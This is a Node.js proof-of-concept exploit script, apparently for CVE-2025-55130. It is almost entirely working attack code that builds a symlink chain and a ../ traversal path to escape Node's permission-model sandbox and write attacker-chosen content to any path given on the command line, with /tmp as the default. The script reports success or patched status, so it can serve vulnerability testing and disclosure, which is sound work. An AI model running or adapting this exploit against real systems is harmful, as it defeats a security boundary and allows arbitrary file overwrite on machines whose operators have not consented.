/*
 * CVE-2025-55130 - Arbitrary File Write
 * 
 * Write files outside sandbox via symlink escape
 * Default target: /tmp (safe for testing)
 * 
 * Run: node --permission --allow-fs-read=. --allow-fs-write=. exploit_write.js [path] [content]
 */

const fs = require('fs');

const TARGET = process.argv[2] || '/tmp/pwned_' + Date.now() + '.txt';
const CONTENT = process.argv[3] || `
# CVE-2025-55130 proof of write
# node ${process.version}
# ${new Date().toISOString()}
# pid: ${process.pid}
# user: ${process.env.USER || 'unknown'}

If you see this file, the target system is vulnerable.
Arbitrary write achieved via symlink permission bypass.
`;

const CHAIN = './wpwn/a/b/c/d/e/f';

console.log(`
 ===============================================
  CVE-2025-55130 // Arbitrary Write
 ===============================================
  target: ${TARGET}
  node:   ${process.version}
 ===============================================
`);

if (typeof process.permission === 'undefined') {
    console.log('[!] permission model not active');
    process.exit(1);
}

// Setup chain
console.log('[*] building symlink chain...');

try {
    fs.rmSync('./wpwn', { recursive: true, force: true });
} catch(e) {}

fs.mkdirSync(CHAIN, { recursive: true });
fs.symlinkSync(__dirname, CHAIN + '/link');

// Build payload path
const depth = __dirname.split('/').filter(Boolean).length;
const traversal = '../'.repeat(depth);
const payload = `${CHAIN}/link/${traversal}${TARGET.replace(/^\//, '')}`;

console.log('[*] payload path: ' + payload);
console.log('[*] attempting write...\n');

try {
    fs.writeFileSync(payload, CONTENT);
    
    console.log('[+] WRITE SUCCESSFUL');
    console.log('[+] file created: ' + TARGET);
    console.log('[+] verify with: cat ' + TARGET);
    console.log('\n[+] VULNERABLE to arbitrary file write');
    
} catch (err) {
    if (err.code === 'ERR_ACCESS_DENIED') {
        console.log('[-] access denied - patched');
    } else {
        console.log('[-] error: ' + err.code + ' - ' + err.message);
    }
}

// Cleanup
fs.rmSync('./wpwn', { recursive: true, force: true });
